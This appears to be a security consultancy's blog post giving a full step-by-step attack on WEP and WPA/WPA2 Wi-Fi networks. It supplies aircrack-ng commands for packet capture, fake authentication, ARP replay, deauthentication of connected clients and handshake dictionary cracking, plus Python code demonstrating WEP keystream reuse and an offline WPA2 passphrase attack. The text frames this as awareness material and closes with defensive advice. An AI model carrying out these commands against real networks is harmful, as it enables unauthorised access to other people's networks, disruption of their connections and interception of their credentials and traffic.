Wireless Network Penetration

Wireless networks are becoming more and more widespread in our daily city lives, and the security issues with these are often neglected. A typical Wi-Fi network is protected with WEP, WPA or WPA2, each built on a different cipher and key-derivation scheme. In this post we show how each of these can be cracked or bypassed by an outsider with no prior knowledge of your systems.

The process requires the aircrack-ng suite, so before starting you need to install the "aircrack-ng" package on your Linux box. A Windows build exists too, but as with most Windows ports it is harder to get running, because monitor mode and packet injection depend on driver support that few Windows drivers offer.

WEP
The weakest option is WEP. It is not advisable: once enough traffic has been captured a WEP key can usually be recovered in a few minutes, regardless of its length. Here is the process explained in detail:

1. Enable monitoring with "airmon-ng" - Type in the terminal:
    sudo airmon-ng start <interface> <channel>
* This creates a monitor-mode interface (airmon-ng prints its name) that you must use in all the following commands wherever <interface> appears.

2. Packet capturing with "airodump-ng" - Type in terminal:
    sudo airodump-ng -c <channel> --bssid 02:AF:5B:D7:1A:A8 -w <file_name> <interface>
    NOTE:
    -c: Select the channel of the target Wifi access point.
    --bssid: MAC address of target access point.
    -w: prefix of the capture file; mandatory in our case. airodump-ng appends a sequence number, so the file is called <file_name>-01.cap.
* Add "--ivs" if you only want to save the initialisation vectors (IVs) instead of full frames; that is all aircrack-ng needs for WEP and it keeps the file small.

3. Associate with the AP (fake authentication) using "aireplay-ng"; this also tells you whether MAC filtering is enabled - Type in terminal:
    sudo aireplay-ng -1 0 -e <target_essid> -a 02:AF:5B:D7:1A:A8 -h MY:MA:CA:DD:RE:SS <interface>
    NOTE:
    -1: fake authentication; the number after it is the re-association delay in seconds (0 = associate once).
    -e: ESSID (name) of target access point.
    -a: MAC address of target access point.
    -h: MAC address of your host (the card you are injecting from).

   The resulting output should look like this if there is no MAC filtering:
    ** Sending Authentication Request
    ** Authentication successful
    ** Sending Association Request
    ** Association successful :-)

>> If there is no MAC filtering (association succeeded) >
4. Perform packet re-injection with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -3 -b 02:AF:5B:D7:1A:A8 -h MY:MA:CA:DD:RE:SS <interface>
    NOTE:
    -3: Standard ARP-request replay.
    -b: MAC address of target access point.
    -h: MAC address of your host.
* You'll now see the #Data column rising rapidly in 'airodump-ng'. It can take around five minutes before the first ARP request is captured and replayed; every replayed request makes the AP emit a new encrypted frame, and therefore a new IV.
>continue to step 5>

>> If there is MAC filtering (authentication works but the association is refused) >
4.1 Perform deauthentication with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -0 3 -a 02:AF:5B:D7:1A:A8 -c 00:00:00:00:00:00 <interface>
    NOTE:
    -0: number of deauthentication bursts to send (3 in our case; 1-5 are good values, 0 means unlimited).
    -a: MAC address of target access point.
    -c: MAC address of a client currently associated with the AP (listed in the lower half of the airodump-ng window).

4.2 Then perform packet re-injection with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -3 -b 02:AF:5B:D7:1A:A8 -h 00:00:00:00:00:00 <interface>
    NOTE:
    -3: an ARP-request replay.
    -b: MAC address of target access point.
    -h: the associated client's MAC address, so the injected frames appear to come from a host the AP already accepts.
* Some drivers drop injected frames whose source MAC differs from the card's own address; if injection fails, set your card's MAC to the client's (for example with macchanger) before step 1 and repeat.
* You'll now see the #Data column rising rapidly in 'airodump-ng'. It can take around five minutes before the first ARP request is captured and replayed.
>continue to step 5>

5. Cracking the key with "aircrack-ng" - Type in terminal:
    sudo aircrack-ng -s <file_name>-01.cap
Alternatively, if you were wise enough to use the --ivs option in step 2, type:
    sudo aircrack-ng -s <file_name>-01.ivs
    NOTE:
    -s: show the key in ASCII as well as hex while cracking.
* Be patient so that there is a sufficient number of IVs (tens of thousands) in the traffic file before you start cracking the key! You can start aircrack-ng while airodump-ng is still capturing; it retries automatically as the file grows.

The important point we learn from this is that key complexity is almost irrelevant in a WEP network. The weakness is the protocol's reuse of a 24-bit IV with the RC4 cipher, not the key, so the difference between cracking a 10-hex-digit key ("64-bit" WEP, a 40-bit key) and a 26-hex-digit key ("128-bit" WEP, a 104-bit key) is only a couple of extra minutes of packet sniffing.
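As an added illustration (not part of the original post and not aircrack-ng's code) of why the ARP replay in step 4 works and why the key length barely matters: WEP keys RC4 with the 3-byte IV sent in the clear followed by the secret root key, so any two frames that share an IV share a keystream. One frame whose plaintext is known hands the attacker the keystream for every other frame with that IV, and the root key is never touched. The keys, IV, ARP request and "secret" payload below are constructed for the demo; the assumption that the attacker knows one frame's full plaintext is labelled in the code.

```python
"""Added example: WEP keystream reuse across a repeated IV, for 40-bit and 104-bit keys."""
import math
import os
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")    # fixed, public 8-byte prefix of every ARP frame
# A later frame on the same IV that the attacker wants to read (constructed payload).
SECRET_PAYLOAD = bytes.fromhex("aaaa030000000800") + b"GET /login?pw=hunter2"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation), exactly as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on air: IV || RC4(IV || root_key, plaintext || CRC-32 ICV)."""
    assert len(iv) == 3 and len(root_key) in (5, 13), "WEP-64 uses a 5-byte key, WEP-128 a 13-byte key"
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + root_key, plaintext + icv)


# --- attacker side: the root key is never used below ---------------------------

def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> tuple[bytes, bytes]:
    """Return (iv, keystream) for a frame whose plaintext the attacker knows."""
    iv, body = frame[:3], frame[3:]
    icv = zlib.crc32(known_plaintext).to_bytes(4, "little")
    return iv, xor(body, known_plaintext + icv)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> tuple[bytes, bool]:
    """Strip the recovered keystream off another frame with the same IV; the ICV confirms it."""
    body = frame[3:]
    if len(keystream) < len(body):
        raise ValueError("known frame is shorter than the target; keystream only covers a prefix")
    pt_icv = xor(body, keystream)
    plaintext, icv = pt_icv[:-4], pt_icv[-4:]
    return plaintext, zlib.crc32(plaintext).to_bytes(4, "little") == icv


def expected_frames_before_iv_repeat() -> float:
    """Birthday bound for a 24-bit IV: about 5100 frames until some IV repeats."""
    return math.sqrt(math.pi / 2 * 2 ** 24)


def demo(key_len: int) -> tuple[bytes, bool]:
    """Recover SECRET_PAYLOAD without the key; the steps are identical for 5- and 13-byte keys."""
    root_key = os.urandom(key_len)                       # 5 bytes = WEP-64, 13 bytes = WEP-128
    iv = bytes.fromhex("0a1b2c")                         # the AP reuses this IV for both frames
    # Frame 1: an ARP request whose content the attacker knows in full (ASSUMPTION of the demo,
    # e.g. a request the attacker provoked). Constructed: who-has 192.168.1.100 tell 192.168.1.1.
    known = (LLC_SNAP_ARP + bytes.fromhex("0001080006040001")
             + bytes.fromhex("02af5bd71aa8") + bytes([192, 168, 1, 1])
             + bytes(6) + bytes([192, 168, 1, 100]))
    frame1 = wep_encrypt(root_key, iv, known)
    frame2 = wep_encrypt(root_key, iv, SECRET_PAYLOAD)  # a later frame, same IV
    iv_seen, keystream = keystream_from_known_plaintext(frame1, known)
    assert iv_seen == frame2[:3]                         # same IV, so the same keystream
    return decrypt_with_keystream(frame2, keystream)


if __name__ == "__main__":
    for key_len in (5, 13):
        plaintext, icv_ok = demo(key_len)
        print(f"{key_len * 8}-bit key: recovered {plaintext!r}, ICV ok={icv_ok}")
    print(f"expected frames before an IV repeats: {expected_frames_before_iv_repeat():.0f}")
```

The real aircrack-ng attack (PTW) is statistical and needs no fully known frame, only the predictable first bytes of many frames with different IVs, which is exactly what the ARP replay manufactures; but the root cause it exploits is the same IV-plus-RC4 construction shown here.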

WPA
Now if one is wise enough to use WPA / WPA2 the process is similar, with the difference that the IV-collection trick no longer applies: WPA derives a fresh per-session key from the passphrase during the 4-way handshake, so there are no reusable IVs to accumulate and nothing to gain from associating and injecting. What we need instead is a capture of that handshake. Therefore we adapt our approach as follows:

The first 2 steps are the same:
1. Enable monitoring with "airmon-ng" - Type in the terminal:
    sudo airmon-ng start <interface> <channel>
* This creates a monitor-mode interface (airmon-ng prints its name) that you must use in all the following commands wherever <interface> appears.

2. Packet capturing with "airodump-ng" - Type in terminal:
    sudo airodump-ng -c <channel> --bssid 02:AF:5B:D7:1A:A8 -w <file_name> <interface>
    NOTE:
    -c: Select the channel of the target Wifi access point.
    --bssid: MAC address of target access point.
    -w: file name of the saved traffic file; mandatory field (in our case).
* Don't use the "--ivs" option here: we need the full EAPOL handshake frames, not just IVs, to crack the key.

3. Perform deauthentication with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -0 3 -a 02:AF:5B:D7:1A:A8 -c 00:00:00:00:00:00 <interface>
    NOTE:
    -0: number of deauthentication bursts to send (3 in our case; 1-5 are good values, 0 means unlimited).
    -a: MAC address of target access point.
    -c: MAC address of a client currently associated with the AP (listed in the lower half of the airodump-ng window).
* With some luck the client reconnects and you capture the new 4-way handshake; airodump-ng then shows "WPA handshake: <bssid>" in the top-right corner of its window.

4. Cracking the key with "aircrack-ng" - Type in terminal:
    sudo aircrack-ng -w <wordlist.lst> <file_name>-01.cap
    NOTE:
    -w: wordlist of candidate passphrases, one per line.
* Here we cannot force the transmission of thousands of IVs. The only handle we have is the handshake, in which the client proves knowledge of the key by computing a MIC over an EAPOL frame, so we must derive the key from each candidate passphrase and compare MICs: an offline dictionary attack. It is slow because every candidate costs 4096 rounds of PBKDF2-HMAC-SHA1 before the comparison can even be made.

A dictionary attack can last a long time and still fail, so spend a fair amount of time preparing a good dictionary based on any information about the access point owner, plus an alphanumeric password list with common character substitutions. John the Ripper on Linux or Cain & Abel on Windows are recommended for generating such lists!

A complex WPA passphrase of 11-14 characters that is not a dictionary word and mixes lower-case letters, capital letters, digits and special characters will take far longer than a week to recover even on the most powerful hardware available, and an average attacker will not pursue it. The important thing to note is that with WPA / WPA2 the strength of the passphrase is what secures the network!
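The following is an added example (not part of the original post and not aircrack-ng's code) of what "aircrack-ng -w" does with the captured handshake, written out so that the per-candidate cost is visible: each word is run through PBKDF2-HMAC-SHA1 with 4096 iterations to get the PMK, expanded to the PTK with the two MAC addresses and two nonces from the handshake, and the resulting KCK is used to recompute the MIC of EAPOL message 2; a match means the passphrase is found. The handshake here is constructed in code with a known passphrase instead of being read from the .cap file: the SSID, client MAC, nonces and EAPOL frame are made up, and the BSSID is the one used in the article. The brute-force rate fed to brute_force_years is an assumption.

```python
"""Added example: offline dictionary attack on a captured WPA2 (CCMP) 4-way handshake."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame, truncated to 16 bytes. KCK = PTK[0:16]."""
    return hmac.new(kck, eapol_with_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC field zeroed (constructed for the demo)."""
    body = (b"\x02"            # descriptor type: RSN
            + b"\x01\x0a"      # key info: pairwise, MIC present, HMAC-SHA1 MIC
            + b"\x00\x10"      # key length
            + bytes(8)         # replay counter
            + snonce           # 32-byte supplicant nonce
            + bytes(16)        # key IV
            + bytes(8)         # key RSC
            + bytes(8)         # key ID
            + bytes(16)        # MIC field, zeroed before the HMAC is taken
            + b"\x00\x00")     # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 1, type Key


def make_capture(passphrase: str) -> dict:
    """Stand-in for the handshake airodump-ng writes to the .cap file (constructed)."""
    hs = {
        "ssid": "NetSafety-Guest",                       # made-up SSID
        "ap_mac": bytes.fromhex("02af5bd71aa8"),         # BSSID used in the article
        "client_mac": bytes.fromhex("001122334455"),     # made-up client
        "anonce": hashlib.sha256(b"anonce").digest(),    # deterministic stand-ins for random nonces
        "snonce": hashlib.sha256(b"snonce").digest(),
    }
    hs["eapol"] = build_eapol_msg2(hs["snonce"])
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol"])         # what the real client sent
    return hs


def dictionary_attack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Candidate -> PMK -> PTK -> MIC; return the candidate whose MIC matches the capture."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])     # the expensive step: 4096 HMAC rounds
        ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return word
    return None


def brute_force_years(length: int, alphabet: int, guesses_per_second: float) -> float:
    """Worst-case time to exhaust a keyspace at a given rate (the rate is your assumption)."""
    return alphabet ** length / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    capture = make_capture("Summer2013!")                # the "unknown" passphrase
    print("recovered:", dictionary_attack(capture, ["password", "letmein", "Summer2013!", "qwerty"]))
    # 11 characters over the 94 printable ASCII symbols at an ASSUMED 1e6 PBKDF2 guesses/s:
    print(f"years to exhaust: {brute_force_years(11, 94, 1e6):.3g}")
```

Note that the salt is the SSID, so a rainbow table built for one common network name ("linksys", "default") transfers to every network with that name; an unusual SSID forces the attacker to pay the PBKDF2 cost per network as well as per candidate.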

Once inside the network a malicious outsider can sniff your traffic: login credentials, bank details entered in forms, browsing activity and much more, exposing you to identity theft and information leakage. So please be aware: use the right encryption and a strong passphrase, and secure your networks.

We hope you enjoyed our article. The NetSafety team provides quality security consulting services, at affordable prices, around the globe! Contact us, if you think we can help!

*************www.netsafety.eu*************